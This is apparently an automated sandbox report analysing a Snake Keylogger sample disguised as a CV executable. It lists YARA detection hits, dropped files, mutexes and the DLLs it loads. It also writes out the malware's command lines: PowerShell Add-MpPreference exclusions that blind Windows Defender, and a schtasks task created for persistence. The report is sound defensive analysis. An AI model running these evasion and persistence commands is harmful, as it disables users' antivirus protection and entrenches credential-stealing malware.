Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000B.00000002.3282277125.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2133658014.0000000004421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 7364, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7364, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: Kayla Dennis CV.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: lyKbfEsVYfQfU.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, -j--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, -j--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, -j--.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, -j--.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Kayla Dennis CV.exe.44978d8.1.raw.unpack, --.cs	Base64 encoded string: 'L/R25pD93jLO+3E3+VbbruzFB+w8ATIgUswH8PVgmZqSxh5DvX1ttLV5ijFT/hS2'
Source: 0.2.Kayla Dennis CV.exe.44b86f8.0.raw.unpack, --.cs	Base64 encoded string: 'L/R25pD93jLO+3E3+VbbruzFB+w8ATIgUswH8PVgmZqSxh5DvX1ttLV5ijFT/hS2'

Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, i0WcuiQWSwH93uGufO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, w1Wamsg80XvcbX1PDi.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, w1Wamsg80XvcbX1PDi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, w1Wamsg80XvcbX1PDi.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, w1Wamsg80XvcbX1PDi.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, w1Wamsg80XvcbX1PDi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, w1Wamsg80XvcbX1PDi.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, i0WcuiQWSwH93uGufO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/15@2/2

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe

File created: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Mutant created: \Sessions\1\BaseNamedObjects\JRXKrmcGlcGytWAcekV
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe

File created: C:\Users\user\AppData\Local\Temp\tmp796.tmp

Jump to behavior

Source: Kayla Dennis CV.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Kayla Dennis CV.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 0000000B.00000002.3288992952.0000000003213000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003265000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003223000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003231000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3293827844.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3288992952.0000000003259000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3295153780.0000000003B10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3289778566.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Kayla Dennis CV.exe

ReversingLabs: Detection: 29%

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe

File read: C:\Users\user\Desktop\Kayla Dennis CV.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Kayla Dennis CV.exe "C:\Users\user\Desktop\Kayla Dennis CV.exe"
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Kayla Dennis CV.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: winsta.dll	Jump to behavior
